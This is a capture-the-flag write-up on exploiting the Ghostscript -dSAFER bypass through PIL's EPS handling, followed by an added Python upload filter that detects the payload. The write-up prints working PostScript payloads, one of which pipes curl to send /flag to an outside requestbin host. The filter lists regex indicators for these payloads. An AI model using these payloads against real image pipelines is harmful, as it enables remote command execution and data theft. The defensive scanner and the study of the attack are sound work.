The challenge was based on a recently disclosed exploit (the Ghostscript -dSAFER bypass reachable through PIL's EPS handling):
https://www.exploit-db.com/exploits/45243/
First, we tried the exploit from the original post as-is, but it didn't work because PIL checks the image size (the %%BoundingBox header) before it hands the file to Ghostscript.
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
So I downloaded a normal PostScript example with a valid header and combined it with the exploit:
%!PS-Adobe-1.0
%%Creator: PS_Write.F
%%CreationDate: 09/29/99
%%Title: region.ps
%%Document-Fonts: Times-Roman
%%BoundingBox: 0 0 1000 500
%%BeginProlog
%%EndProlog
/Palatino-Roman findfont
0.0000 0.0000 0.0000 setrgbcolor
%%Page: 1 1
/Times-Roman findfont
20 scalefont
setfont
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%curl --data "`cat /flag`" http://requestbin.fullcontact.com/12jsa501) currentdevice putdeviceprops
showpage
%%Trailer
%%Pages: 1
%%EOF
quit
I used requestbin.fullcontact.com to receive the result. I was stuck here for about 10 minutes trying to send the result with nc, then realized the target OS might not have nc installed.
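From the defender's side, the writeup shows why an image pipeline should never let PostScript reach Ghostscript unchecked. The following is an added example (not part of the original writeup): a pre-filter for an upload handler that recognizes plain PS/EPS and DOS-EPS-wrapped input and flags the indicators used by the payload above. The indicator names and the helper functions are my own.

```python
import re
import struct

# Indicators taken from the payload in the writeup: undefining setpagedevice,
# the "{ null restore } stopped" trick to escape the SAFER save level, and the
# %pipe% device that turns /OutputFile into command execution.
INDICATORS = {
    "pipe_device": re.compile(rb"%pipe%"),
    "outputfile_redirect": re.compile(rb"/OutputFile\s*\("),
    "setpagedevice_undef": re.compile(rb"userdict\s+/setpagedevice\s+undef"),
    "putdeviceprops": re.compile(rb"currentdevice\s+putdeviceprops"),
    "restore_abuse": re.compile(rb"\{\s*null\s+restore\s*\}\s*stopped"),
}

# DOS EPS binary header: magic, then little-endian offset/length of the PS section.
DOS_EPS_MAGIC = b"\xC5\xD0\xD3\xC6"


def extract_postscript(data: bytes):
    """Return the PostScript text inside an upload, or None if it is not PS/EPS.

    PIL (and Ghostscript) accept both a bare '%!PS' file and a DOS EPS wrapper,
    so a filter that only looks at the first four bytes can be bypassed.
    """
    if data.startswith(b"%!PS"):
        return data
    if data.startswith(DOS_EPS_MAGIC) and len(data) >= 12:
        offset, length = struct.unpack_from("<II", data, 4)
        ps = data[offset:offset + length]
        return ps if ps.startswith(b"%!PS") else None
    return None


def scan_upload(data: bytes):
    """Return the sorted indicator names found in an upload ([] if clean or not PS).

    Callers should reject the file outright if any indicator is present; a
    stricter policy is to reject every upload for which extract_postscript()
    returns non-None, since a photo upload never needs an interpreter.
    """
    ps = extract_postscript(data)
    if ps is None:
        return []
    return sorted(name for name, pat in INDICATORS.items() if pat.search(ps))


if __name__ == "__main__":
    # Constructed sample: the first payload from the writeup.
    sample = b"%!PS\nuserdict /setpagedevice undef\nsave\nlegal\n" \
             b"{ null restore } stopped { pop } if\n{ legal } stopped { pop } if\n" \
             b"restore\nmark /OutputFile (%pipe%id) currentdevice putdeviceprops\n"
    print(scan_upload(sample))
```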